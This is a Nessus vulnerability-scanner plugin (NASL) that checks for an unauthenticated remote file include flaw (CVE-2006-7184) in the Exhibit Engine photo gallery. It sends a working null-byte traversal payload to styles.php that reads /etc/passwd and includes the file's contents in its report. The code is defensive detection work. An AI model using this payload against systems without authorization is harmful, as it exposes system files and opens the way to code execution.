# kst-gpl
#
#       This script was written by Justin Seitz <jms@bughunter.ca>
#	Per Justin : GPLv2
#


desc["english"] = "
Synopsis :

The remote web server contains a PHP script that is affected by a
remote file include issue. 

Description:

The remote web server is running Exhibit Engine, a PHP based photo
gallery management system. 

The version of Exhibit Engine installed on the remote host fails to
sanitize input to the 'toroot' parameter before using it in the
'styles.php' script to include PHP code.  Provided PHP's
'register_globals' setting is enabled, an unauthenticated attacker can
exploit this issue to view arbitrary files and execute arbitrary code,
possibly taken from third-party hosts, on the remote host. 

Solution :

No patches or upgrades have been reported by the vendor at this time. 

Risk factor :

Medium / CVSS Base Score : 6.8
(CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)";

if(description)
{
 # set script identifiers

 script_id(80058);;
 script_version("$Revision: 1.5 $");

 script_cve_id("CVE-2006-7184");
 script_bugtraq_id(20793);

 name["english"] = "Exhibit Engine toroot Parameter Remote File Include Vulnerability";
 summary["english"] = "Tries to read a local file with Exhibit Engine";
 family["english"] = "CGI abuses";

 script_name(english:name["english"]);
 script_description(english:desc["english"]);
 script_summary(english:summary["english"]);

 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2006 Justin Seitz");

 script_family(english:family["english"]);

 script_dependencies("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

#
# verify we can talk to the web server, if not exit
#

if(!get_port_state(port)) exit(0);
if(!can_host_php(port:port)) exit(0);

#
# create list of directories to scan
#


# Loop through directories.
if (thorough_tests) dirs = make_list("/gallery","/photos","/images","/exhibit","/exhibitengine","/ee", cgi_dirs());
else dirs = make_list(cgi_dirs());
#
# Iterate through the list
#

file = "/etc/passwd";

foreach dir (dirs) {

#
#
#       Attack: Attempt a remote file include of /etc/passwd
#
#
  attackreq = http_get(item:string(dir, "/styles.php?toroot=", file, "%00"),port:port);
  attackres = http_keepalive_send_recv(port:port, data:attackreq, bodyonly:TRUE);
  if (attackres == NULL) exit(0);

  if (egrep(pattern:"root:.*:0:[01]:", string:attackres) ||
    string("main(", file, "\\0styles/original.php): failed to open stream") >< attackres ||
    string("main(", file, "): failed to open stream: No such file") >< attackres ||
    "open_basedir restriction in effect. File(" >< attackres)   {

    passwd = "";
    if (egrep(pattern:"root:.*:0:[01]:", string:attackres))
      passwd = attackres;

    if (passwd) {
      if (dir == "") dir = "/";
      info = string("The version of Exhibit Engine installed in directory '", dir, "'\n",
        "is vulnerable to this issue. Here are the contents of /etc/passwd\n",
        "from the remote host :\n\n", passwd);
     report = string(desc["english"],"\n\nPlugin output\n\n",info);
    }
    else report = desc["english"];

    security_warning(data:report, port:port);
    exit(0);
  }
}
